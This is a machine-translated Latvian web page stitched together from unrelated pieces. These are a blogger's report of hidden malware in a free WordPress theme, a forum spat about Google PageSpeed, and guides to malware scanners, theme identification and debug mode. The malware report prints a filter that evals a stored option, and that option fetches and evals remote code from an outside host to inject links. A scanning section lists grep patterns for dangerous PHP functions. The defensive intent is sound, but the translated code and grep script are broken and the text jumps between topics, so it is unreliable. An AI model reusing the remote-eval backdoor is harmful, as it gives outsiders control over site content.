Sveiki draugi. Vai esat pārliecināts, ka tas ir bez maksas? WordPress veidne, ko izmantojat savām vietnēm un emuāriem, ir patiesi drošs un nesatur slēptus draudus un ļaunprātīgs kods? Vai esat par to pilnīgi pārliecināts? Absolūti?)

Vai jūs domājat, ka veidne tika palaists cauri un noņemts no tās? slēptās saites, un darbs ir padarīts. Jūs periodiski skenējat vietnes failus, izmantojot pretvīrusu, ielūkojaties Yandex tīmekļa pārziņa rīkos cilnē Drošība un jūtaties atvieglots, redzot tur ziņojumu: " Vietnē netika atklāts neviens ļaunprātīgs kods«.

Tā arī es domāju. Es negribētu tevi apbēdināt, bet...

Slēpts bīstams kods bezmaksas WordPress veidnēs

Šī ir vēstule, kuru pagājušajā nedēļā saņēmu pa e-pastu no sava hostinga uzņēmuma. Nesen viņi ir ieviesuši regulāru visu vietnes failu pārbaudi, lai meklētu ļaunprātīgu saturu, un viņi atrada šo saturu pie manis.

Viss sākās, kad kādu pēcpusdienu apmeklēju savu vietni un nevarēju to palaist — tika parādīts aizskarošs ziņojums par to, ka netiek atrasti faili ar paplašinājumu php. Nedaudz saspringusi, devos izpētīt mapes saturu ar vietni hostingā un uzreiz atklāju problēmu - mans veidnes fails fuctions.php tika pārdēvēts par Functions.php.malware, kas, šķiet, neviennozīmīgi liecināja par antivīrusu. strādā šeit vai kaut kas tamlīdzīgs) Aizgājusi uz pastu, es atradu augstāk minēto ziņojumu no hostera.

Pirmā lieta, ko es izdarīju, protams, bija pārbaudīt šo failu, pētīja tā saturu, skenēja ar visādiem antivīrusiem, desmitiem tiešsaistes pakalpojumi vīrusu pārbaudei utt. — beigās nekas netika atrasts, visi vienbalsīgi apgalvoja, ka fails ir pilnīgi drošs. Protams, izteicu savas šaubas saimniekam, sakot, ka esi kaut ko saputrojis, taču katram gadījumam palūdzu sniegt ziņojumu par ļaunprātīga koda atklāšanu.

Un tā viņi man atbildēja

Iegāju google informāciju par šo kodu un nopietni domāju...

Kā veidnē atrast ļaunprātīga koda daļu

Kā izrādās, tas ir patiesi netriviāls paņēmiens, kas ļauj ieinteresētajām pusēm pārsūtīt datus uz jūsu vietni un mainīt lapu saturu bez jūsu ziņas! Ja izmantojat bezmaksas veidni, tad Es ļoti iesaku pārbaudīt jūsu functions.php tālāk norādīto kodu:

add_filter('saturs', '_emuāra informācija', 10001);
funkcija _bloginfo($content)(
globālā $post;
if(is_single() && ($co=@eval(get_option('emuāra opcija'))) !== false)(
atgriezt $ co;
) else return $content;
}

Pat ar manām ļoti zemajām PHP zināšanām ir skaidrs, ka tiek izveidots noteikts filtrs, kas piesaistīts globālajam mainīgajam ierakstam un saturam, kas ir atbildīgi par satura attēlošanu tikai emuāra ierakstu lapās (nosacījums is_single). Jau aizdomīgi, vai ne? Nu, tagad redzēsim, ko tas izdos. šo kodu mūsu mājas lapā.

Ļoti aizdomīgi izskatās arī datubāzē pieprasītā interesanta iespēja blogoption. Dosimies uz mūsu datu bāzi MySQL dati un atrodi tur tabulu ar nosaukumu wp_options, ja nemainīji prefiksus, tad pēc noklusējuma tā izskatīsies šādi. Un tajā mēs atrodam līniju, kas mūs interesē, ko sauc par blogoption

Kāda skaistule! Mēs redzam šādu iespēju

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Tie. No noteiktas vietnes (un krievu vietnes, ņemiet vērā) viņi atgriež saturu, kurā var būt jebkas! Jebkurš skaits saišu, ļaunprātīgu kodu, izmainītu tekstu utt. Piekļūstot pašai vietnei, tiek parādīta 403 piekļuves kļūda, kas nav pārsteidzoši. Protams, arī šo opciju izņēmu no datu bāzes.

Saskaņā ar upuru informāciju precīzs jūsu raksta saturs parasti tiek atgriezts tikai ar vienu modifikāciju — jebkura punkta “” vietā. tekstā tika paslēpta atvērta saite! Un starp citu, šo iespēju tiek ierakstīts datu bāzē, kad pati veidne ir instalēta, un pēc tam kods, kas to veiksmīgi veic, pašiznīcinās. Un es divus gadus dzīvoju ar tādiem atkritumiem, un neviens antivīruss vai pakalpojums man to neatklāja šie draudi uz visu to laiku. Godīgi sakot, es nepamanīju, vai šis triks man kādreiz darbojās, vai arī mans drošības spraudnis bloķēja šo funkciju (vai varbūt kāds no WordPress atjauninājumiem aizvēra šo caurumu), taču tas joprojām ir nepatīkami.

Morāle par bezmaksas sieru

Kā jums patīk mūsu veidņu “tulkotāju” (vai to personu, kas tās ievieto savos katalogos) izsmalcinātība? Tas nav jums, lai izgrieztu saites no kājenes) Žēl, ka es neatceros, no kurienes lejupielādēju savu veidni, tas bija sen, pretējā gadījumā es noteikti būtu uzrakstījis pāris sirsnīgus. Un, ja man toreiz būtu tāda pati pieredze, kāda man ir tagad, es noteikti neizmantotu bezmaksas veidne, vai kā pēdējo līdzekli, es nelejupielādētu no nezināmiem avotiem!

Vienkāršāk ir nopirkt kādu oficiālu premium veidni par 15-20 dolāriem un dzīvot mierā, zinot, ka tajā nav caurumu vai šifrētu saišu, un pat ja ir ievainojamības, izstrādātāji noteikti izlaidīs atjauninājumu, kurā šīs bedres būs slēgts. ( Starp citu, Artems nesen publicēja rakstu, kurā viņš runā par premium veidnēm un pat izsniedz reklāmas kodus brutālām atlaidēm interesentiem)

• Pat netērējiet savu laiku pakalpojumā Googlefaker.

  Google rīks, neskatoties uz visiem tā trūkumiem, var darīt lietas, ko citi nevar, piemēram, noteikt, ka attēli vietnē netiek rādīti pareizajā izmērā. Tas ir tad, kad 1000x1000 attēls tiek parādīts kā 100x100 miniatūra, ko pārlūkprogramma saspiež līdz 100x100.

  Es burtiski tikai citu dienu laboju nevienmērīgu klienta pavedienu par šo problēmu. tur sānjoslā tika rādītas 110x82 miniatūras - bet tur bija iebāztas oriģinālās, pilna izmēra bildes.

  Turklāt kāds cits rīks parādīs, ka jūsu attēli nav īpaši optimizēti? kad png failu var saspiest no 500kb līdz 45kb, nezaudējot kvalitāti - tā ir ļoti svarīga informācija.

  Nu kāpēc tu atkal iesaki muļķības?

  Tagad parādiet man, kāds cits rīks var identificēt šādas acīmredzamas vietnes problēmas?

  
  
  

  https://i.imgur.com/tOZcemv.jpg
  https://i.imgur.com/fEarWYT.jpg
  utt.. Ceru, ka pietiks.

  Flektors, Ja jūs izmantotu parastos rīkus (un nelietotu dažādus Google viltojumus), šie jautājumi vienkārši nepastāvētu.
  Viss iepriekš minētais sniedz informāciju, kas ir par 3 kārtībām augstāka un noderīgāka nekā šis Google viltojums. Tiešām nepieciešama un noderīga informācija.

  Viss iepriekš minētais sniedz informāciju, kas ir par 3 kārtībām augstāka un noderīgāka par šo Google viltojumu. Tiešām nepieciešama un noderīga informācija.

  Man nepatīk Google rīks, kaut vai tāpēc, ka tā pakalpojumi nevadās pēc tā. bet viņš lieliski parāda acīmredzamas lietas, piemēram, attēlus. Ir arī gzip, pārlūkprogrammas kešatmiņa utt. — tas ir visredzamākais.

  un es labprātāk skatos Google, jo svarīgs ir tikai tā novērtējums. Kāda ir atšķirība, kādus trešo pušu pakalpojumus rādīs, ja Google joprojām vadās pēc sava novērtējuma?

  Pārbaudiet savu, lai redzētu, kur attēli ir ievietoti nepareizi. Kādas problēmas?
  Man bija grūti atrast kaut ko līdzīgu, ar ko uzņemt ekrānuzņēmumus.

  jo svarīgs ir tikai viņa vērtējums.

  Kuram tas interesē? Tikai nesaki to Google :)

  Jā, novērtējums. iegūt 100/100 nav problēma. Bet šī vietnei ir katastrofa.
  
  

  Jā, novērtējums. saņemt 100/100 - nekādu problēmu. Bet šī vietnei ir katastrofa.

  Nu, jūs sniedzāt Google kļūdu 503. Kāda jēga?
  tas nav problēmas risinājums.

  un jā – Google vērtējums ir svarīgs.
  Es nezinu, cik lielā mērā viņi neatklāj šādus skaitļus - bet būtu stulbi izveidot pakalpojumu, no kura nekas nav atkarīgs, vai ne?

  PS un pat ja Google nerūp savs vērtējums, tas galvenokārt ir nepieciešams pašam tīmekļa pārzinim, nevis Google. ja tīmekļa pārzinim nav iespējots gzip, pārlūkprogrammas kešatmiņa un attēli nav pareizajā izmērā, tas ir jālabo.

  un nav jālabo kaut kas, ko Google neuzskata par svarīgu (es runāju par citu pakalpojumu vērtējumiem) — tā būs tikai laika izšķiešana.

  un jā – Google vērtējums ir svarīgs.

  Joprojām iemācieties analizēt rezultātus.

  bet būtu stulbi veidot pakalpojumu, no kura nekas nav atkarīgs, vai ne?

  Es jums pateikšu šausmīgu noslēpumu - Google pakalpojumi (un ne tikai Google) jau ilgu laiku nav paredzēti cilvēkiem. Cik viena un tā paša Google pakalpojumu ir nogrimuši aizmirstībā? Cik daudz noderēja un pēc tam pazuda? Sen pagājuši ir laiki, kad Google darīja lietas cilvēku labā. Bigdata, jā.

  tas galvenokārt ir nepieciešams pašam tīmekļa pārzinim,

  Tīmekļa pārzinim tiešām ir noderīgas un vajadzīgas lietas. Nav jēgas tērēt laiku nejaušiem atkritumiem. (ja neesat pamanījis, viņi rāda arī Google papagaiļus)

  kāds maģisks attaisnojums - iemācieties analizēt rezultātus.
  

  labi - es arī jums atbildēšu - iemācieties analizēt rezultātus. ja visas pārējās lietas ir vienādas (absolūti identiski ranžēšanas faktori — no saitēm uz PF), pirmā meklēšanas rezultātos būs vietne ar augstāko Google punktu skaitu.

  netici man? Nu, tavas tiesības.
  Joprojām nav iespējams kaut ko līdzīgu pārbaudīt — nav vienlīdzīgu vietņu.

  tam jebkurā gadījumā nav nozīmes, jo optimizācija tiek veikta ne tik daudz Google, bet gan tā apmeklētāju labā. kā ar tiem pašiem attēliem, kad tīmekļa pārzinis ievieto 5Mb attēlu kā sīktēlu.

  kāda tad jēga?

  Google papagaiļu “svarībā”.

  kāds maģisks attaisnojums - iemācieties analizēt rezultātus.
  tiešs arguments visiem gadījumiem.

  Ja jūs sakāt kaut ko par PS, izdošana ir vienīgais patiesais pierādījums.

  Kaut ko līdzīgu pārbaudīt joprojām nebūs iespējams - nav vienlīdzīgu vietņu.

  Kāpēc viņi atšķiras? Vai pat nevarat pārbaudīt Google papagaiļus, lai atrastu vietnes, kas norādītas meklēšanas rezultātos? Ir 50 un pat 30, kas ir diezgan TOP10.

  tas ir tikai viens no tūkstošiem ranžēšanas faktoru. Tāpēc es runāju par “vienlīdzīgām” (nevis atšķirīgām) vietnēm - tikai šajā gadījumā varat būt pārliecināts, ka Google papagaiļi darbojas.

  Iespējams, Facebook Google papagaiļiem ir “0” vērtējums, taču tas joprojām būs TOP1 vaicājumam “Facebook”. tas ir kaut kā pašsaprotami.

  Google PageSpeed Insights ir tikai viens pluss - atsevišķa meklēšanas rezultātu analīze galddatoriem un mobilajām ierīcēm, citādi tas ir tik slikti, kā vienmēr neapmierināta kašķīga sieva 😀 Novērtē par zemu, atrod vainu tajā, ko nevar labot (resursi no citiem domēniem, ieskaitot tos pašus Google)
  Ir daudz analogu, kas analizē vietnes konfigurācijas problēmas,
  Apzināti tēmas sākumā neiedevu saiti uz Pingdom, piemēram, man labāk patīk Webpagetest, atšķirība ir tikai formā, kā rezultāts tiek pasniegts, un subjektīvā ērtībā.
  Daudziem atrod arī slikti saspiestus attēlus, vienīgais jautājums ir mest nost 10 papagaiļus un pateikt, ka attēli jūsu vietnē nav optimizēti 1 baita atšķirības dēļ...
  Paņemiet to pašu GTMetrix, ir novērtējums, kura pamatā ir PageSpeed algoritms un Yslow,
  Turklāt vietne ar 95% PageSpeed ​​var būt “apakšā” neoptimizēta pakalpojumā Insights, tā patiešām ir viņu problēma, un tās rada problēmas citiem, īpaši tiem, kuri nevar analizēt vērtējumu un rezultātu nozīmi.
  Vietne ir laba, optimizēta, bet uz G PS I - “ak, viss ir slikti”

  Vai jūs tiešām domājat, ka šie paši "Google papagaiļi" ir vissvarīgākais reitinga faktors pasaulē?

  Es domāju, ka tie ir papagaiļi. Tie nesniedz nekādus noderīgus datus. Un tas nemaz neietekmē ielādes ātrumu (kāds lapas ātrums? Tas ir viltojums no paša pakalpojuma nosaukuma). Ātrumu mēra nevis Google papagaiļos, bet gan bitos/s.
  Kas attiecas uz reitingu - ja TOP10 vietnēs ir 30 Google papagaiļi, tad kāda jēga no tiem vispār?
  Kaut kas tamlīdzīgs.

  Tikai šajā gadījumā jūs varat būt pārliecināti, ka Google papagaiļi darbojas.

  Darbojas NEVIS papagaiļi, bet gan visi faktori. 90% no kuriem nav šajā viltotajā, un 90% no tā, kas ir - muļķības.
  Vienīgais ieguvums no tā Lamer ir tas, ka varat lejupielādēt optimizētu grafiku. Bet tikai grafika, nevis stili un skripti.

• Tēma “Vietnes kļūdu pārbaude” jaunām atbildēm ir slēgta.

WordPress ir vispopulārākais dzinējs dažādu informācijas vietņu un emuāru veidošanai. Jūsu vietnes drošība ir vairāk nekā jūsu datu drošība. Tas ir daudz svarīgāk, jo tā ir arī visu to lietotāju drošība, kuri lasa un uzticas jūsu resursam. Tāpēc ir tik svarīgi, lai vietne nebūtu inficēta ar vīrusiem vai kādu citu ļaunprātīgu kodu.

Kā aizsargāt WordPress no uzlaušanas, mēs apskatīsim kādā no šiem rakstiem, taču tagad es vēlos jums pastāstīt, kā pārbaudīt, vai WordPress vietnē nav vīrusu un ļaunprātīga koda, lai pārliecinātos, ka viss ir droši.

Pati pirmā iespēja, kas nāk prātā, ir tāda, ka jūs esat uzlauzuši hakeri un jūsu vietnes kodā izveidojuši savas aizmugures durvis, lai varētu sūtīt surogātpastu, ievietot saites un citas sliktas lietas. Dažreiz tas notiek, taču tas ir diezgan rets gadījums, ja programmatūra tiek atjaunināta laikā.

Ir tūkstošiem bezmaksas WordPress motīvu un dažādu spraudņu, un tas jau var radīt draudus. Viena lieta, kad lejupielādējat veidni no WordPress vietnes, un pavisam cita lieta, ja to atrodat kreisajā vietnē. Negodīgi izstrādātāji savos produktos var iegult dažādus ļaunprātīgus kodus. Risks ir vēl lielāks, ja bez maksas lejupielādējat premium veidnes, kur hakeri, ne par ko neriskējot, var pievienot kaut kādu drošības caurumu, caur kuru viņi var iekļūt un darīt to, kas viņiem nepieciešams. Tāpēc ir tik svarīgi pārbaudīt, vai WordPress vietnē nav vīrusu.

Pārbauda, ​​vai WordPress vietnē nav vīrusu

Pirmā lieta, kas jums jāmeklē, pārbaudot vietni vīrusiem, ir WordPress spraudņi. Ātri un vienkārši varat skenēt savu vietni un atrast aizdomīgus koda apgabalus, kuriem ir vērts pievērst uzmanību neatkarīgi no tā, vai tie atrodas motīvā, spraudnī vai pašā Wodpress kodolā. Apskatīsim dažus no populārākajiem spraudņiem:

1.TOC

Šis ļoti vienkāršais spraudnis pārbauda visus jūsu vietnē instalētos motīvus, lai noskaidrotu, vai tajos nav ļaunprātīga koda. Spraudnis atklāj slēptās saites, kas šifrētas, izmantojot base64 koda ievietošanu, kā arī parāda detalizētu informāciju par atrastajām problēmām. Visbiežāk atrastie koda fragmenti nav vīrusi, taču tie var būt potenciāli bīstami, tāpēc tiem vajadzētu pievērst uzmanību.

Atvērt "Izskats" -> "TAC" tad pagaidiet, līdz visas tēmas ir pārbaudītas.

2. VIP skeneris

Ļoti līdzīgs TOC skenerim tēmām, bet izvada vairāk Detalizēta informācija. Tās pašas saites noteikšanas iespējas slēptais kods un citi ļaunprātīgi ieliktņi. Vienkārši atveriet VIP skenera vienumu rīku sadaļā un analizējiet rezultātu.

Var būt pietiekami, lai noņemtu papildu faili piemēram, desktop.ini. Vai arī jums ir sīkāk jāaplūko, kas notiek failos, izmantojot base64.

3. Ļaunprogrammatūras apkarošana no GOTMLS.NET

Šis spraudnis ļauj ne tikai skenēt vietnes motīvus un kodolu pret vīrusiem, bet arī aizsargāt vietni no brutālā spēka parolēm un dažādiem XSS, SQLInj uzbrukumiem. Meklēšana tiek veikta, pamatojoties uz zināmiem parakstiem un ievainojamībām. Dažas ievainojamības var novērst uz vietas. Lai sāktu failu skenēšanu, atveriet "Anti-Malvare" sānu izvēlnē un noklikšķiniet uz "Palaist skenēšanu":

Lai varētu palaist skenēšanu, jums ir jāatjaunina parakstu datu bāzes.

4. Wordfence

Šis ir viens no populārākajiem WordPress drošības un ļaunprātīgas programmatūras skenēšanas spraudņiem. Izņemot skeneri, kurā var atrast lielāko daļu grāmatzīmju WordPress kods, pastāv pastāvīga aizsardzība pret dažāda veida uzbrukumiem un paroles brutālu spēku. Meklēšanas laikā spraudnis atrod iespējamās problēmas ar dažādiem spraudņiem un motīviem, ziņo par nepieciešamību atjaunināt WordPress.

Atveriet cilni "WPDefence" sānu izvēlnē un pēc tam dodieties uz cilni "Skenēt" un nospiediet "Sākt skenēšanu":

Skenēšana var ilgt noteikts laiks, bet pēc pabeigšanas jūs redzēsiet detalizētu ziņojumu par atrastajām problēmām.

5. Antivīruss

Šis ir vēl viens vienkāršs spraudnis, kas pārbaudīs jūsu vietnes veidni, lai atrastu ļaunprātīgu kodu. Trūkums ir tāds, ka tiek skenēta tikai pašreizējā veidne, bet informācija tiek parādīta pietiekami detalizēti. Jūs redzēsiet visas bīstamās funkcijas, kas ir motīvā, un pēc tam varēsiet detalizēti analizēt, vai tās nerada briesmas. Atrodiet preci "Antivīruss" iestatījumos un pēc tam noklikšķiniet uz "Skenējiet motīvu veidnes tūlīt":

6. Integritātes pārbaudītājs

Ir arī ieteicams pārbaudīt integritāti WordPress faili, ja vīruss jau ir kaut kur reģistrējies. Šim nolūkam varat izmantot integritātes pārbaudītāja spraudni. Tas pārbauda visus galvenos, spraudņu un veidņu failus, vai nav notikušas izmaiņas. Skenēšanas beigās jūs redzēsiet informāciju par mainītajiem failiem.

Tiešsaistes pakalpojumi

Ir arī vairāki tiešsaistes pakalpojumi, kas ļauj pārbaudīt, vai WordPress vietnē nav vīrusu, vai pārbaudīt tikai veidni. Šeit ir daži no tiem:

themecheck.org- lejupielādējat motīvu arhīvu un redzat visus brīdinājumus par iespējamām ļaunprātīgām funkcijām, kas tajā tiek izmantotas. Jūs varat ne tikai apskatīt informāciju par savu tēmu, bet arī par citām tēmām, kuras augšupielādējuši citi lietotāji, kā arī dažādas versijas Tēmas. Neatkarīgi no atrastajiem spraudņiem var atrast šajā vietnē. WordPress motīva pārbaude ir arī ļoti svarīga.

virustotal.com- labi zināms resurss, kurā varat pārbaudīt, vai savā vietnē vai veidnes failā nav vīrusu.

ReScan.pro- WordPress vietnes skenēšana pret vīrusiem, izmantojot šo pakalpojumu, tiek veikta statiskā un dinamiskā analīze, lai atklātu iespējamās novirzīšanas; Pārbauda vietni pret dažādiem melnajiem sarakstiem.

sitecheck.sucuri.net- vienkāršs pakalpojums vīrusu vietņu un tēmu skenēšanai. Ir WordPress spraudnis. Atklāj bīstamas saites un skriptus.

Manuāla pārbaude

Nekas nevar būt labāks par manuālu pārbaudi. Linux ir šī brīnišķīgā grep utilīta, kas ļauj meklēt patvaļīgu virkņu gadījumus mapē ar failiem. Atliek saprast, ko mēs meklēsim:

eval - šī funkcija ļauj izpildīt patvaļīgu PHP kodu, to neizmanto sevi cienoši produkti, ja kāds no spraudņiem vai tēma izmanto šo funkciju, pastāv gandrīz 100% varbūtība, ka tajā ir vīruss;

• base64_decode- šifrēšanas funkcijas var izmantot kopā ar eval, lai paslēptu kaitīgo kodu, taču tās var izmantot arī miermīlīgiem nolūkiem, tāpēc esiet uzmanīgi;
• sha1- cita ļaunprātīga koda šifrēšanas metode;
• gzinflate- saspiešanas funkcija, tie paši mērķi, kopā ar eval, piemēram, gzinflate(base64_decode(code);
• strrev- pagriež līniju atpakaļ ne agrāk, jo opciju var izmantot primitīvai šifrēšanai;
• drukāt- izvada informāciju pārlūkprogrammā, kopā ar gzinflate vai base64_decode tas ir bīstams;
• file_put_contents- Pats WordPress vai spraudņi joprojām var izveidot failus failu sistēmā, taču, ja motīvs to dara, jums vajadzētu būt uzmanīgiem un pārbaudīt, kāpēc tas tā dara, jo var tikt instalēti vīrusi;
• file_get_contents- vairumā gadījumu izmanto miermīlīgiem nolūkiem, taču to var izmantot, lai lejupielādētu ļaunprātīgu kodu vai nolasītu informāciju no failiem;
• čokurošanās- tas pats stāsts;
• fopen- atver failu rakstīšanai, nekad nevar zināt, kādam nolūkam;
• sistēma- funkcija izpilda komandu iekšā Linux sistēma, ja pats motīvs, spraudnis vai WordPress to dara, visticamāk, ir kāds vīruss;
• simbolsaite- izveido simboliskas saites sistēmā, iespējams, vīruss mēģina izveidot galveno failu sistēma pieejams no ārpuses;
• kopiju- kopē failu no vienas vietas uz citu;
• getcwd- atgriež pašreizējā darba direktorija nosaukumu;
• cwd- maina pašreizējo darba mapi;
• ini_get- saņem informāciju par PHP iestatījumiem, bieži vien mierīgiem nolūkiem, bet nekad nevar zināt;
• kļūdu_ziņošana(0)- atspējo jebkuru kļūdu ziņojumu izvadi;
• window.top.location.href - javascript funkcija, izmanto novirzīšanai uz citām lapām;
• uzlauzts- tātad katram gadījumam pārbaudām, pēkšņi pats hakeris nolēma mums pastāstīt.

Katru atsevišķu vārdu varat aizstāt ar šādu komandu:

grep -R "uzlauzts" /var/www/path/to/files/wordpress/wp-content/

Vai arī izmantojiet vienkāršu skriptu, kas meklēs visus vārdus vienlaikus:

value="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
kopēt (
eval(
sistēma (
simbolsaite (
kļūdu_ziņošana(0)
drukāt
file_get_contents(
file_put_contents(
fopen(
uzlauzts"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Vai esat kādreiz domājuši, kāda tēma tiek izmantota vietnē?

Bieži vien, meklējot ideālo tēmu, mēs skatāmies uz citiem pabeigtiem projektiem, lai atrastu ko līdzīgu vai izveidotu savu vietni par šo pašu tēmu, tikai ar savu individuālo dizainu.

Šajā apmācībā mēs parādīsim, kādus rīkus un trikus varat izmantot, lai uzzinātu, kāda tēma tiek izmantota jūsu WordPress vietnē.

1. metode. IsItWP verifikācijas vietne

Vienkāršākais veids ir doties uz vietni isitwp.com un apskatīt vietni, kas jūs interesē.

Šis ir tiešsaistes rīks, kas parādīs, kādu motīvu izmanto WordPress un vai WordPress šajā vietnē vispār tiek izmantots.

Ja vietnē darbojas WordPress, IsItWP mēģinās noskaidrot pašreizējās tēmas nosaukumu.

Tā arī mēģinās noskaidrot, kādi aktīvie spraudņi tiek izmantoti vietnē:

Ja jums ir paveicies un šī nav pielāgota vai bērnu tēma, IsItWP parādīs savu nosaukumu, un pēc tam šo motīvu varēsiet atrast meklētājprogrammās.

2. metode. Nosakiet manuāli

Dažreiz vietņu īpašnieki vai izstrādātāji maina vietējās WordPress motīva nosaukumu. Šajā gadījumā tādi rīki kā IsItWP nevarēs jums palīdzēt.

Bet pat ja tā, tie joprojām var palikt vietnes kodā dažādi padomi, kas palīdzēs noskaidrot, kāda veida motīvs ir instalēts.

Paskatīsimies.

Katram WordPress motīvam ir jābūt failam stils.css. Šī faila iekšpusē ir galvene, kas parasti norāda motīva nosaukumu, motīva autoru, versiju un motīva izstrādātāja vietni. Tajā ir arī uzskaitītas citas CSS stila veidnes, kuras izmanto motīvs.

Lai atrastu šo failu, vispirms jādodas uz pašu vietni. Ar peles labo pogu noklikšķiniet kaut kur galvenajā lapā un dodieties uz avota kodu ( Skatīt lapas avotu).

Atveras jaunā pārlūkprogrammas cilnē avots mājas lapa vietne.

Tagad jums ir jāatrod koda rinda, kas izskatās apmēram šādi:

Lai atvieglotu uzdevumu, varat meklēt šajā cilnē ar fragmenta kodu " tēmas". Šī ir daļa no direktorija, kurā stils.css.

Tādā veidā jūs atradīsiet ceļu, kur atrodas fails style.css, un varat atvērt šo failu tieši pārlūkprogrammā jaunā cilnē.

Faila style.css augšpusē būs galvene ar nosaukumu (par ko mēs runājām iepriekš). Šī ir pakalpojuma informācija par tēmu. Tas izskatās apmēram šādi:

/* Motīva nosaukums: Motīva nosaukums Motīva URI: https://example.com Autors: ThemeAuthorName Autora URI: https://example.com Apraksts: Mans motīvs ir elastīgs WordPress motīvs, kas paredzēts portfeļa vietnēm Versija: 1.1.47 Licence: GNU vispārējās publiskās licences v2 vai jaunākas licences URI: http://www.gnu.org/licenses/gpl-2.0.html Teksta domēns: hestia Tagi: emuārs, pielāgots logotips, portfolio, e-komercija, rtl-language-support , pēcformāti, režģa izkārtojums, vienas kolonnas, divu kolonnu, pielāgots fons, pielāgotas krāsas, pielāgota galvene, pielāgota izvēlne, piedāvātā attēla galvene, piedāvātie attēli, elastīgā galvene, pilna platuma -veidne, lipīga ziņa, tēmas opcijas, vītņoti komentāri, gatavs tulkošanai */

No šī bloka jūs varat uzzināt tēmas nosaukumu un izstrādātāja adresi. Tad atliek tikai šo tēmu atrast internetā.

3. metode. Kā atrast vecāku tēmu

Daudzas vietnes izmanto bērnu tēmas, lai pielāgotu to izskatu. Un tā ir pilnīgi pareiza pieeja.

Šajā gadījumā, ja atradāt failu stils.css no bērnu motīva, tā galvenē būs informācija par vecākmotīvu:

/* Motīva nosaukums: Mans bērns Motīva apraksts: Tikai bērna tēma Autors: Pīters Smits Autora URL: Ierakstiet šeit autora emuāra vai vietnes URL Veidne: hestia Versija: 1.0 Licence: GNU vispārējā publiskā licence v2 vai jaunāka licences URI: http :/ /www.gnu.org/licenses/gpl-2.0.html Teksta domēns: my-child-theme */

Iepriekš minētajā piemērā vecāku motīvu norāda parametrs " Veidne", kas nozīmē, ka šajā bērnu motīvā tiek izmantota vecāku tēma "Hestia".

Varat arī uzzināt par vecākmotīvu no avota koda, kas aprakstīts 2. metodē. Kodā jūs atradīsiet atsauci uz style.css failu ne tikai no pakārtotā motīva, bet arī no vecākmotīva.

Taču neaizmirstiet, ka izstrādātājs var mēģināt mainīt visas style.css galvenes uz savām, un tādā gadījumā būs ļoti grūti noteikt sākotnējo motīvu.

Sveiki visiem! Laiks nestāv uz vietas un katru reizi pēc kārtas kodolā parādās jaunas funkcijas. Ja iepriekš lielākā daļa tolaik nestandarta uzdevumu bija jārealizē, izmantojot papildu programmēšanu, tad tagad situācija mainās. Pastāv skaidra tendence paplašināt funkcionalitāti jau no kastes.

Atskatoties uz 2010. gadu, kad stāvēju uz atklājumu sliekšņa un pirmo reizi iepazinos ar , atceros, cik grūti man bija spert pirmos soļus. Katram elementāram uzdevumam es atradu un uzstādīju spraudņus, kuru kopējais skaits varētu sasniegt vairākus desmitus! 😮 Tad pienāca pārdomāšanas un tiekšanās pēc minimālisma laiks. Optimizācijas sadaļa atspoguļo dažus aspektus darbā, ko esmu paveicis, lai paātrinātu emuāru.

Iespējot WordPress atkļūdošanas režīmu

Emuāra veidne kopš pirmajām dienām ir mainīta, iegūstot jaunas funkcijas, stilus un klases. Iegūstot kritisko masu, tas kļuva neveikls - ir ļoti grūti uzturēt darba stāvokli un augstu produktivitāti. Pagājušajā gadā notika lielas, no pirmā acu uzmetiena neredzamas izmaiņas – no jauna izkārtojuma un darba ar sīktēliem līdz mikroatzīmēšanai.

Pirmā lieta pēc transformācijas bija pārlūkprogrammā atvērt izstrādātāja konsoli un pārbaudīt, vai nav kļūdu un brīdinājumu. Nākamais solis - WordPress atkļūdošana. Režīms ir iespējots wp-config.php konfigurācijas failā, atrodiet tajā rindiņu:

Define("WP_DEBUG" , false );

un aizstāt false ar patiesu . Līnijai vajadzētu izskatīties šādi:

Define("WP_DEBUG" , true );

Ja ir kļūdas, kļūdas vietā tiks parādīts ziņojums, kurā aprakstīta problēma un ietekmētie faili. Tās varētu būt parsēšanas kļūdas vai novecojušas funkcijas, kas ir izņemtas no kodola vai aizstātas ar jaunām.

Brīdinājuma pamatā ir viens vienkāršs fakts: kļūdas ziņojums satur absolūto ceļu uz failu attiecībā pret servera saknes direktoriju. Ziņu redz ne tikai administrators, bet visi lietotāji. Ilustratīvs piemērs:

Parsēšanas kļūda: sintakses kļūda, negaidīts endifs (T_ENDIF) mapē /u57109403/data/www/site.ru/wp-content/themes/default/index.php 23. rindiņā

Kā redzams piemērā, vērtība u57109403 var būt pieteikšanās, lai piekļūtu serverim, un uzbrucējiem ir tikai jāuzmin parole. Esi uzmanīgs.

Motīvu pārbaude — WordPress motīvu testēšanas rīks

Papildus iebūvētajai funkcijai WP_DEBUG ir labs instruments izstrādātājs, kas paredzēts, lai pārbaudītu tēmas atbilstību mūsdienu Codex standartiem.

Tas ir ieviests kā tēmas pārbaudes spraudnis, kuru varat lejupielādēt no oficiālās repozitorija lapas.

Pēc spraudņa aktivizēšanas dodieties uz tā lapu (Izskats — tēmas pārbaude). Kad atkļūdošanas režīms ir atspējots, tiks parādīts šāds ziņojums:

BRĪDINĀJUMS WP_DEBUG nav iespējots! Pirms augšupielādes, lūdzu, pārbaudiet savu motīvu ar iespējotu atkļūdošanu!

Kā aktivizēt šo režīmu, es aprakstīju raksta pirmajā daļā. Tas nav nepieciešams, taču tas ir ļoti ieteicams analīzes pilnīgumam. Lai sāktu pārbaudi, noklikšķiniet uz "Pārbaudīt".

Ja motīvu failu avota kodā izmantojat kirilicu, sagatavojieties pārskatā sastapties ar šāda veida informāciju:

INFORMĀCIJA: failā single.php tika atrastas nedrukājamas rakstzīmes. Iespējams, vēlēsities pārbaudīt, vai šajā failā nav kļūdu.

Jūs varat atspējot šādu ziņojumu rādīšanu, atzīmējot izvēles rūtiņu blakus “Apspiest INFO”. Piezīme nākotnei: lokalizējot motīvu, izmantojiet īpašos tulkošanas failus ru_RU.po un ru_RU.mo, nevis rediģējiet avota kodu, aizstājot angļu valodas vārdi uz krievu valodu.

Motīvu pārbaudes spraudnis noderēs WordPress motīvu izstrādātājiem un vietņu administratoriem. Pārskats ir balstīts uz standarta komplekta pārbaudi minimālās prasības pašreizējā tēmā un satur šādu apzīmējumu:

• Nepieciešams - trūkst vajadzīgās funkcijas, klases vai apraksta;
• Brīdinājums - brīdinājumi, piemēram, par slēptu failu klātbūtni;
